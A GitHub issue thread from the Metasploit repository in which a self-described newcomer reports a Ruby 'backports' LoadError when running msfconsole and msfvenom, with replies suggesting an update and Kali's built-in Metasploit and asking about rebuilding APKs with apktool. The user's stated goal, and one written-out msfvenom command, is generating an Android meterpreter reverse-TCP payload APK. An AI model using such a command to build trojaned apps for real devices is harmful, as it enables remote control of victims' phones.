### ISSUE TITLE
msfvenom error

### ISSUE THREAD

**Issue by smchaitu** [rapid7/metasploit-framework#11031]
##error with msfvenom while creating payload apk & msfconsole

1.i am runnung kali linux light live with cd 

```
/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/msf/core.rb:14:in `require': cannot load such file -- backports (LoadError)
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/msf/core.rb:14:in `<top (required)>'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/msf/core/payload/apk.rb:3:in `require'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/msf/core/payload/apk.rb:3:in `<top (required)>'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/msf/core/payload_generator.rb:2:in `require'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/lib/msf/core/payload_generator.rb:2:in `<top (required)>'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/msfconsole:48:in `require'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.20/msfconsole:48:in `<top (required)>'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `load'
	from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `<main>'
```

i need solution 
it results same for both msfconsole & msfvenom -p android/meterpreter/reverse_tcp LHOST=my_ip LPORT=8080 R > app.apk
 
i am new to kali&metasploit

i need to genarate apk payload

**Comment by Green-m** [comment]
Have you tried to update the metasploit?

**Comment by dsx12** [comment]
Is there a alternative tool other than apktool to rebuild decompiled apks that successfully works?

**Comment by dsx12** [comment]
Could I do this manually and recompile on windows with apktool? I attempted and received another error in windows lol..

**Comment by busterb** [comment]
I suggest you uninstall Metasploit Community/Pro and switch to the one built into Kali linux first.
